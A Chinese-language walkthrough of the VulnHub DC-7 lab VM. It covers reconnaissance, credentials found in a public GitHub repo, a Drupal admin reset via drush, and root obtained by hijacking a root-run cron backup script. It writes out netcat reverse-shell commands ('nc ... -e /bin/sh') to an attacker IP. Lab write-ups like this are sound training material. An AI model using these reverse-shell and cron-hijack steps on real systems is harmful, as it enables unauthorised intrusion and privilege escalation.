VulnHub—DC-7

01 环境搭建

• 靶机环境下载：https://www.vulnhub.com/entry/dc-7,356/
• 题目信息如下

Description
DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

While this isn't an overly technical challenge, it isn't exactly easy.

While it's kind of a logical progression from an earlier DC release (I won't tell you which one), there are some new concepts involved, but you will need to figure those out for yourself. :-) If you need to resort to brute forcing or dictionary attacks, you probably won't succeed.

What you will need to do, is to think "outside" of the box.

Waaaaaay "outside" of the box. :-)

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

Technical Information
DC-7 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs.

I have tested this on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go.

Important
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.

In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.

Contact
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).

I can be contacted via Twitter - @DCAU7

02 信息收集

将靶机环境恢复到virtualbox之后，开始第一步信息收集工作。

发现靶机

查看攻击机的ip为192.168.56.1(环境恢复时采用Host-Only Adapter)

使用nmap扫描网段内的ip地址

nmap -sP 192.168.56.1/24

扫描发现的192.168.56.19就是目标靶机的ip地址。

端口扫描

使用nmap对目标靶机开放的端口进行扫描

nmap -Pn -n -sV 192.168.56.19

发现目标靶机开放了2个tcp端口22，80。web服务是drupal 8

尝试用dirb，droopescan扫描都没有发现有效信息。

03 Get Shell

获得账户1

重新查看题目信息，发现有一些提示。这个题目源自一个早期版本。

在网站首页上比以前系列的题目多了一行信息@DC7USER

搜索@DC7USER发现在github上有这个账户。

进入后发现一个staffdb项目，在项目中发现一个带有账户信息的文件。

看代码是个数据库账户。但是目前没有可以登录数据库的接口，尝试用这个账户登录web，失败，登录ssh成功。

获得web账户

查询用户的sudo配置，搜索suid程序都没有找到能有效提权的方法。
在home目录下有个mbox文件，和一些备份文件。查看mbox发现里面记录了一个每15min的定时任务。

通过执行/opt/scripts/backups.sh脚本完成备份。且该定时任务是由root权限执行。查看脚本信息。

该脚本只能由root和www-data账户有权修改。查看脚本内容。

里面调用了drush命令，该程序是用来管理drupal的。

尝试用drush来更改admin账户密码。执行失败。

drush user-password admin --password="1234"

再次查看脚本，在执行drush前切换了目录。尝试切换目录再次执行。执行成功。

使用admin账户登录成功

反弹shell

下载shell插件，导入。

执行nc 192.168.56.1 4444 -e /bin/sh命令获得反弹 shell

04 提权

获得www-data权限后就可以更改/opt/scripts/backups.sh脚本。添加一条反弹shell的命令nc 192.168.56.1 1234 -e /bin/sh。

等待定时任务执行，就可以获得root权限。等了还挺长时间的-_-||